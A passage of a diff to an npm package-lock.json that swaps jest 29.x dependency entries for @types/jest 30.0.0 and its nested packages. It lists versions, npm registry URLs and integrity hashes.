"jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } - } - }, - "jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - }, - "jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lodash.set": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/lodash.set/-/lodash.set-4.3.2.tgz", - "integrity": "sha512-4hNPN5jlm/N/HLMCO43v8BXKq9Z7QdAGc/VGrRD61w8gN9g/6jF9A4L1pbUgBLCffi0w9VsXfTOij5x8iTyFvg==" - }, - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "requires": { - "semver": "^6.0.0" - } - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "requires": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "requires": { - "wrappy": "1" - } + "@types/istanbul-lib-coverage": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.6.tgz", + "integrity": "sha512-2QF/t/auWm0lsy8XtKVPG19v3sSOQlJe/YHZgfjb/KBBHOGSV+J2q/S671rcq9uTBrLAXmZpqJiaQbMT+zNU1w==", + "dev": true }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", + "@types/istanbul-lib-report": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", + "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", "dev": true, "requires": { - "mimic-fn": "^2.1.0" + "@types/istanbul-lib-coverage": "*" } }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", + "@types/istanbul-reports": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.4.tgz", + "integrity": "sha512-pk2B1NWalF9toCRu6gjBzR69syFjP4Od8WRAX+0mmf9lAjCRicLOWc+ZrxZHx/0XRjotgkF9t6iaMJ+aXcOdZQ==", "dev": true, "requires": { - "yocto-queue": "^0.1.0" + "@types/istanbul-lib-report": "*" } }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", + "@types/jest": { + "version": "30.0.0", + "resolved": "https://registry.npmjs.org/@types/jest/-/jest-30.0.0.tgz", + "integrity": "sha512-XTYugzhuwqWjws0CVz8QpM36+T+Dz5mTEBKhNs/esGLnCIlGdRy+Dq78NRjd7ls7r8BC8ZRMOrKlkO1hU0JOwA==", "dev": true, "requires": { - "p-limit": "^2.2.0" + "expect": "^30.0.0", + "pretty-format": "^30.0.0" }, "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "@jest/expect-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-30.0.4.tgz", + "integrity": "sha512-EgXecHDNfANeqOkcak0DxsoVI4qkDUsR7n/Lr2vtmTBjwLPBnnPOF71S11Q8IObWzxm2QgQoY6f9hzrRD3gHRA==", + "dev": true, + "requires": { + "@jest/get-type": "30.0.1" + } + }, + "@jest/schemas": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-30.0.1.tgz", + "integrity": "sha512-+g/1TKjFuGrf1Hh0QPCv0gISwBxJ+MQSNXmG9zjHy7BmFhtoJ9fdNhWJp3qUKRi93AOZHXtdxZgJ1vAtz6z65w==", + "dev": true, + "requires": { + "@sinclair/typebox": "^0.34.0" + } + }, + "@jest/types": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/types/-/types-30.0.1.tgz", + "integrity": "sha512-HGwoYRVF0QSKJu1ZQX0o5ZrUrrhj0aOOFA8hXrumD7SIzjouevhawbTjmXdwOmURdGluU9DM/XvGm3NyFoiQjw==", + "dev": true, + "requires": { + "@jest/pattern": "30.0.1", + "@jest/schemas": "30.0.1", + "@types/istanbul-lib-coverage": "^2.0.6", + "@types/istanbul-reports": "^3.0.4", + "@types/node": "*", + "@types/yargs": "^17.0.33", + "chalk": "^4.1.2" + } + }, + "@sinclair/typebox": { + "version": "0.34.37", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.34.37.tgz", + "integrity": "sha512-2TRuQVgQYfy+EzHRTIvkhv2ADEouJ2xNS/Vq+W5EuuewBdOrvATvljZTxHWZSTYr2sTjTHpGvucaGAt67S2akw==", + "dev": true + }, + "ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", + "dev": true + }, + "ci-info": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-4.3.0.tgz", + "integrity": "sha512-l+2bNRMiQgcfILUi33labAZYIWlH1kWDp+ecNo5iisRKrbm0xcRyCww71/YU0Fkw0mAFpz9bJayXPjey6vkmaQ==", + "dev": true + }, + "expect": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/expect/-/expect-30.0.4.tgz", + "integrity": "sha512-dDLGjnP2cKbEppxVICxI/Uf4YemmGMPNy0QytCbfafbpYk9AFQsxb8Uyrxii0RPK7FWgLGlSem+07WirwS3cFQ==", "dev": true, "requires": { - "p-try": "^2.0.0" + "@jest/expect-utils": "30.0.4", + "@jest/get-type": "30.0.1", + "jest-matcher-utils": "30.0.4", + "jest-message-util": "30.0.2", + "jest-mock": "30.0.2", + "jest-util": "30.0.2" + } + }, + "jest-diff": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-30.0.4.tgz", + "integrity": "sha512-TSjceIf6797jyd+R64NXqicttROD+Qf98fex7CowmlSn7f8+En0da1Dglwr1AXxDtVizoxXYZBlUQwNhoOXkNw==", + "dev": true, + "requires": { + "@jest/diff-sequences": "30.0.1", + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "pretty-format": "30.0.2" + } + }, + "jest-matcher-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-30.0.4.tgz", + "integrity": "sha512-ubCewJ54YzeAZ2JeHHGVoU+eDIpQFsfPQs0xURPWoNiO42LGJ+QGgfSf+hFIRplkZDkhH5MOvuxHKXRTUU3dUQ==", + "dev": true, + "requires": { + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "jest-diff": "30.0.4", + "pretty-format": "30.0.2" + } + }, + "jest-message-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-30.0.2.tgz", + "integrity": "sha512-vXywcxmr0SsKXF/bAD7t7nMamRvPuJkras00gqYeB1V0WllxZrbZ0paRr3XqpFU2sYYjD0qAaG2fRyn/CGZ0aw==", + "dev": true, + "requires": { + "@babel/code-frame": "^7.27.1", + "@jest/types": "30.0.1", + "@types/stack-utils": "^2.0.3", + "chalk": "^4.1.2", + "graceful-fs": "^4.2.11", + "micromatch": "^4.0.8", + "pretty-format": "30.0.2", + "slash": "^3.0.0", + "stack-utils": "^2.0.6" + } + }, + "jest-mock": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-30.0.2.tgz", + "integrity": "sha512-PnZOHmqup/9cT/y+pXIVbbi8ID6U1XHRmbvR7MvUy4SLqhCbwpkmXhLbsWbGewHrV5x/1bF7YDjs+x24/QSvFA==", + "dev": true, + "requires": { + "@jest/types": "30.0.1", + "@types/node": "*", + "jest-util": "30.0.2" + } + }, + "jest-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-30.0.2.tgz", + "integrity": "sha512-8IyqfKS4MqprBuUpZNlFB5l+WFehc8bfCe1HSZFHzft2mOuND8Cvi9r1musli+u6F3TqanCZ/Ik4H4pXUolZIg==", + "dev": true, + "requires": { + "@jest/types": "30.0.1", + "@types/node": "*", + "chalk": "^4.1.2", + "ci-info": "^4.2.0", + "graceful-fs": "^4.2.11", + "picomatch": "^4.0.2" + } + }, + "picomatch": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.2.tgz", + "integrity": "sha512-M7BAV6Rlcy5u+m6oPhAPFgJTzAioX/6B0DxyvDlo9l8+T3nLKbrczg2WLUyzd45L8RqfUMyGPzekbMvX2Ldkwg==", + "dev": true + }, + "pretty-format": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-30.0.2.tgz", + "integrity": "sha512-yC5/EBSOrTtqhCKfLHqoUIAXVRZnukHPwWBJWR7h84Q3Be1DRQZLncwcfLoPA5RPQ65qfiCMqgYwdUuQ//eVpg==", + "dev": true, + "requires": { + "@jest/schemas": "30.0.1", + "ansi-styles": "^5.2.0", + "react-is": "^18.3.1" } } } }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", + "@types/node": { + "version": "20.4.1", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.4.1.tgz", + "integrity": "sha512-JIzsAvJeA/5iY6Y/OxZbv1lUcc8dNSE77lb2gnBH+/PJ3lFR1Ccvgwl5JWnHAkNHcRsT0TbpVOsiMKZ1F/yyJg==", "dev": true }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", + "@types/stack-utils": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.3.tgz", + "integrity": "sha512-9aEbYZ3TbYMznPdcdr3SmIrLXwC/AKZXQeCf9Pgao5CKb8CyHuEX5jzWPTkvregvhRJHcpRO6BFoGW9ycaOkYw==", + "dev": true + }, + "@types/yargs": { + "version": "17.0.33", + "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.33.tgz", + "integrity": "sha512-WpxBCKWPLr4xSsHgz511rFJAM+wS28w2zEO1QDNY5zM/S8ok70NNfztH0xwhqKyaK0OHCbN98LDAZuy1ctxDkA==", "dev": true, "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" + "@types/yargs-parser": "*" } }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", + "@types/yargs-parser": { + "version": "21.0.0", + "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", + "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", "dev": true }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", + "ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", "dev": true, "requires": { - "find-up": "^4.0.0" + "color-convert": "^2.0.1" } }, - "pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", + "braces": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", + "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", "dev": true, "requires": { - 